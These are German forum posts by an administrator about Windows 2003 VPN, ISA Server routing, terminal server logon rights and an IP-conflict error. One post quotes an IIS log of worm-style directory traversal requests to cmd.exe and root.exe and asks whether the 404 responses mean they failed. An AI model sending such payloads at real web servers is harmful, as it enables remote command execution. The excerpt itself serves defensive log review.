Crockett

@grizzly999 ich habe dir eine Email geschickt. Gruß Christian

@grizzly999 Hallo und danke für den Link ! Aber muss das mit der Registry nicht nur im Win2000 Prof rein ? Der VPN Server ist ein Windows2003 Standard Server und mit einem XP Client komme ich mit einem Preshared Key ohne Probleme drauf ? Das ganze ist immer noch für die gleiche Sache weswegen wir auch gemailt hatten :-( Montag soll das ganze laufen. Die Chef´s stellen sich das immer so einfach vor :-)) Gruß Christian

@Hr_Rossi Danke für die schnelle Antwort. Ich werde es morgen mal auf einem Test System probieren. Hast du vielleicht ein Link zu MS wo dieses beschreiben steht ? Am besten auf deutsch. Mfg Christian

Hallo ! Habe einen VPN Server auf Windows2003 Basis laufen. Dort sind nur L2TP-IPSec Verbindungen erlaubt. In den Eigenschaften des RAS und Routings habe ich einen Preshared Key vergeben. Wenn ich nun mich mit einem WinXP Client SP 1 + 818043 Hotfix verbinde geht dieses, weil ich unter der VPN Verbindung bei Sicherheit den Preshared Key eingeben kann. Bei Windows 2000 SP4 mit Hoffix 818043 finde ich keine Möglichkeit dieses einzugeben. Wer weiß Rat ? Mfg Christian

@ weimer sorry das ich jetzt erst antworte, habe im Moment etwas viel zu tun. Das mit den beiden Routern wäre grundsätzlich nicht schlecht, habe aber auf beiden Standorten nur ein 1024/128 FLAT Rate DSL zu Verfügung. Weiterhin kann ich unseren vorhandenen DSL Router aus bestimmtten Gründen nicht wechseln. Mfg Christian

@ ITMike Ich habe jetzt alle Einstellungen bei der Gruppenrichtline und Sicherheitsrichtlinie durch. Dort ist niergendwo etwas eingeschränkt. Was meinst du mir wenn sich der User mit /console connected ? Muss evlt. der Terminal Lizenzserver aktiverit sein damit eine Anmeldung möglich ist ? Dieses habe ich noch nicht gemacht. Das ist doch erst nach 60 Tagen notwendig oder ? Mfg Christian

@ITMike Hallo ! Ja das ist dort eingetragen. Rechte für RemoteDesktopbenutzer, Administratoren, Domänen-Benutzer. Nimm ich den Admin da raus, gehts auch nicht mehr mit Admin. Setzte ich ihn wieder rein, dann gehts mit dem Admin auch wieder. Nur mit dem "normalen" Benutzer gehts nicht. Gruß Christian

@Stragami Einmal unter Start-Programme-Verwaltung-Active Directory Benutzer und Computer. Dann Eingeschaften auf Server und Gruppenrichtlinie. Dort dann lokale Anmeldung und Anmelden über Terminal-Dienste. Ebenfalls unter Verwaltung. dann bei Sicherheitsrichtlinie für Domänencontroller. Dort das selbe eingestellt. Geht leider immer noch nicht. Gruß Christian

Hallo ! Ich habe hier einen Terminal-Server auf Windows2003 Server (Standard-Edition) installiert. Vorweg der Server ist ein DC. In der Gruppenrichtline habe ich der Gruppe Remotedesktopbenutzer und Domänen-Benutzer die Rechte für die lokale Anmeldung gegeben. Ebenfalls in der Gruppenrichtlinie das Recht für "Anmelden über Terminaldienste" gewährt. Wenn ich mich nun am Terminal-Server anmelden will, mit einem User der in der Gruppe der Domänen-Benutzer und der RemoteDesktop Benutzer ist, kommt die Fehlermeldung "Die lokale Sicherheitsrichtlinie erlaubt es Ihnen nicht, sich interaktiv anzumelden". Im Profil des Users ist unter Terminal-Sitzung auch der Haken für Terminal-Sitzung zulassen drin. Weiß jemand einen Rat ? Mfg Christian

Hallo ! Ich möchte unser Außenbüro über VPN an unser internes Netzwerk anbinden. Dieses möchte ich über L2TP-IPSEC realiseren. Folgende Hardware/Software. DSL Router mit Verindung zum Internet. DynDNS vorhanden. ISA 2000 Firewall Server aufgesetzt auf Windows 2000 Server. interner DomainController ist Windows2003 Standard. Ich habe auf dem 2000 Server wo der ISA läuft RAS und Routing installiert. Ich habe auf dem DC die Zertifikatsstelle installiert. Eine Einwahl via VPN funktioniert mit PPTP. Mit L2TP bekomme ich es im Moment nicht hin weil ich an den Zertifikaten scheitere. Im Netz habe ich nur Anleitungen für Windows 2003 gefunden. Kann mir jemand sagen wie ich die Zertifikate ausstellen kann und wie ich das RAS und Routing konfigurieren muss. Oder kennt jemand eine Seite mit einer guten Anleitung ? MFg Christian

@grizzly999 Ok, danke erstmal für die Tipps, ich probiere mal rum und melde mich dann wieder. Gruß Christian

@Cyver Daran hatte ich auch schon gedacht aber das "normale interne Netz" bei uns hat 192.168.x.x. Dort steht nirgends eine 2.IP mit 10.0.0.x drin.... und selbst wenn warum bei allen Adressen von 10.0.0.1 -10.0.0.254 ??? @grizzly999 Wie schon gesagt interne Netz ist 192.168.x.x, darin gibt es einen ISA Server und einen DC. Auf dem ISA läuft kein IIS, kein DHCP etc....Auf dem DC läuft DHCP mit Adressvergabe von 192.168.x.x Adressen (5 Stück). Hinter dem ISA kommt ein DSL Router(10.0.0.1) von DLINK, dort ist DHCP auf Disable. und selbst wenn er Enable wäre dürfte dieses nicht von ISA durchgelassen werden, da der DSL Router für den ISA ja das externe Device ist.... Die Meldung das die IP vergeben ist kommt aber auch wenn ich den Server an einen Switch hänge der im 192.168.x.x Bereich aufgestellt ist.... Alles logische habe ich schon tausend mal durch....aber der Fehler ist so komisch das ich den Fehler weitersuchen werde und finden muss :-)) Gruß Christian

@ maddin Nein, daran liegt es def. nicht. Der DHCP von unserem DC hat einen komplett anderen Adress raum. Selbst wenn ich das Kabel ziehe , Server neustarte, dann IP eingebe und Kabel wieder stecke, kommt ein IP Konflikt.. Wie gesagt es gibt keine weiteren DHCP´s im Netz und vom 10.0.0.x Adress Raum sind def. nur 2 IP´s vergeben. Der Server meckert aber bei jeder IP die ich einstelle...... So etwas habe ich noch nicht erlebt, aber ich suche weiter :-)) Gruß Christian

Hallo ! Habe gerade einen Windows 2003 WebEdition Server aufgesetzt. Bei der Installation habe ich keine IP vergeben. Nach der Installation hat der Server von unserem DC via DHCP eine Adresse bekommen und damit habe ich dann die ganzen Treiber / Upates etc eingespielt (via Internet). Als ich den IIS nun fertig konfiguriert hatte und alle Patche etc drauf waren wollte ich die entgültige IP für den Server eintragen. Diese muss im 10.0.0.x Netz liegen. Egal was ich im TCP/IP einstelle, er meldet sofort das diese IP Adresse schon vergeben wäre. Habe alle probiert von 10.0.0.1 bis 10.0.0.254. Bei allen meckert er diese sei vergeben. Gebe ich eine IP aus 192.168.0.x oder 192.168.1.x ein, wird diese ohne zu murren angenommen. Hat jemand eine Idee ? Gruß Christian

@Lian Habe beim 2003 Server nichts gefunden ? Kann man das konfigurieren oder ist das einfach Build In ? Gruß Christian

@Lian Danke für den Link.. Hatte darüber mal was gelesen und auch schon mal runtergeladen. Ließ sich bei mir aber nicht installieren. Setze einen SBS 2003 ein wo der IIS 6.0 drauf läuft. Kann es sein das das Tool nur für die älteren Versionen vom Windows Servern und IIS ist ? Gruß Christian

@din Danke für die Antwort... Sind die Versuche denn fehlgeschlagen weil hinten der Code 404 im Log steht ? Kann man evtl so etwas lokal testen ob der Server auf sowas reagiert ? Gruß Christian

Hallo ! Hiermal ein Auszug aus dem Log von meiner IIS. ------ 2004-07-26 07:08:11 192.168.0.5 GET /scripts/root.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /MSADC/root.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /c/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /d/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/..../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/..../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:15 192.168.0.5 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:15 192.168.0.5 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 ---------- Am Ende steht immer der Code 404, heißt das das diese Versuche gescheitert sind oder sollte ich mir sorgen machen ? Gruß Christian

Hallo ! Ich habe im Routing und RAS bei dem W2k Server (wo der ISA drauf läuft) jetzt eine Route eingerichtet wo die externe IP Adresse über den 2. internen Router geleitet wird. Ein Ping von den Workstations klappt nun wunderbar. Jedoch läuft auf der externen IP ein WebServer. Dieser wird aber nach wie vor vom ISA abgerufen. Kann man im ISA irgendwo einstellen das er die bestimmte URL (http://172.x.x.x) nicht selber abruft sondern auf den 2. internen Router verweist ? Gruß Christian

Hallo ! Wie kann ich dem ISA 2000 Server beibringen das er eine Anfrage an eine bestimmte externe IP Adresse umleitet auf einen anderen interenen Router ? Habe es über Zielsatz und Routingregel probiert aber das klappt nicht so wirklich . Danke im vorraus ! Gruß Christian

@Wildi Danke nochmal für die Mail... Also der Router kann VPN Endpunkt sein (DSL Router), damit wäre der Nortel eigentlich überflüssig...Aber unsere Zentrale will es halt einheitlich... Werde mal sehen was passiert wenn das IPSec durchgeht.. Lt. dem Menschen der den Nortel programmiert soll es angeblich DSL Router geben die den Header nicht verändern...... Das Gerät kommt die Tage dann werde ich sehen ob ich ein Problem bekomme :-( Schreibe dann mal näheres.. Gruß Christian

@Wildi Also der Router sollte das so handeln können das er die IPSec Pakete nicht anrührt. Es ist ein Gerät von LanReady welches auch eigene VPN Tunnel zwischen 2 Routern aufbauen kann. Ich werde es jetzt wohl so machen, das ich den Nortel mit einer Seite in das 10.0.0.x Netz hängen werde und mit einer Seite in das 192.168.x.x Netz. Somit läuft der Nortel parallel zum ISA, selbiger wird damit umgangen. Anders geht es leider nicht. Gruß Christian

@grizzly999 Ja, verstanden habe ich das mit der Client Seite auch nicht, und ihn gefragt ob es nicht reicht wenn man das einfach am Router (Nortel) einstellen würde. So wie es in dem Link steht den ich im letzten Post geschrieben hatte, soll es bei den Nortel Routern gehen. Die beschreiben das dort zwar für einen Nortel Switch, denke aber mal das es beim Router gehen sollte. Der Mensch der das programmiert meinte nicht. Gruß Christian

@grizzly999 Danke für die Antwort... Heute habe ich noch einmal mit dem Menschen telefoniert der den Router (Nortel) programmiert für uns. Ich fragte ihn ob es mit NAT-T nicht realisierbar wäre, weil ich dieses im Zusammenhang mit dem Nortel Router auf ISAServer.og gelesen hatte http://www.isaserver.org/articles/IPSec_Passthrough.html Dort stand es unter Punkt 5.5. Er meinte aber das es nicht ginge weil das NAT-T von der Client Seite aus gehen müsste und nicht vom Nortel aus. Gruß Christian

@wildi Serververöffentlichung bei den Ports wäre ja nicht das Problem, bloss für das ESP, dieses nutzt ja keine Ports sondern die Protokoll Def. 50, das kann ich ja nirgends einstellen. @Grizzly999 Hast du eine Idee dazu ? Gruß Christian